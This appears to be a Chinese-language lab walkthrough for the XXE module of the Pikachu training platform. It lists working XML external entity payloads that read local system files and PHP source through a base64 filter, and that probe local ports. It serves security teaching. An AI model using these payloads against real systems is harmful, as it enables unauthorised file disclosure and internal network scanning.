任务一:XXE
实验环境:
本地搭建pikachu。
进入pikachu平台。进入XXE模块。点击XXE进入测试页面。
步骤:
- 分析源码。
- 查看系统文件内容。
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<note>&xxe;</note>
3)查看PHP源代码。(文件路径以自己实际电脑为准)
可以用绝对路径:
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpstudy_pro/WWW/pikachu-master/vul/rce/rce.php"> ]>
<note>&xxe;</note>
也可以用相对路径:
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=../rce/rce.php"> ]>
<note>&xxe;</note>
4)爆破开放端口。
尝试80端口:
<?xml version = "1.0"?>
<!DOCTYPE noet [
<!ENTITY xxe SYSTEM "http://127.0.0.1:80"> ]>
<note>&xxe;</note>
尝试81端口:
<?xml version = "1.0"?>
<!DOCTYPE noet [
<!ENTITY xxe SYSTEM "http://127.0.0.1:81"> ]>
<note>&xxe;</note>
设置模糊测试位置:
设置payload:
查看结果